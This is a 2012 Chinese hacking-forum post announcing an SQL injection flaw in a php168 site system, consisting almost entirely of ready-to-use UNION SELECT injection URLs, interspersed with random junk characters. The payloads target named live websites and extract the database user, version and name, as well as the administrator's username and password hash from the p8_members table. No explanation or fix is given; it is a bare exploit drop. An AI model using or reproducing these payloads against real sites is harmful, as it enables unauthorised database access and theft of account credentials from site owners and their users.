找回密码
 立即注册
查看: 3584|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--  [+ ~' R: }! x  k- U* t
                                                         3 y' W" ]$ `4 z6 _4 c
                                       & L0 w! l. P- D3 Y& K5 O$ I" u

6 T+ ^  J# w. F& [
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--8 j2 S0 B6 e( ?, ~
                                                     
3 T, Z: b8 r( i+ X                                                                  
+ _/ j) r* ?0 N1 ?' o                                                        
2 h' ]+ g3 H! Q( e4 N% p8 a1 l% }- lhttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--! \5 T4 f( T, \+ L/ V

8 ]5 Z5 T, M4 b6 u4 [9 [* V; @
- ?; N% D$ _6 w4 ~4 D! Q& |. E* Y; C6 c5 q/ ~( D! b0 z
                                                            : \6 c+ A" u" D3 I, g/ q

- f3 V' s& w$ P+ R/ Yhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
$ d+ i  F% n& O" Y7 F0 w2 d7 ]
, g( n  I7 v3 n0 O
& S" I- h( T7 ~/ F$ m- s, M% T6 e  e; R/ {$ e4 F+ E1 g8 c
                                                                    
; A+ T6 u5 C5 B+ l

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表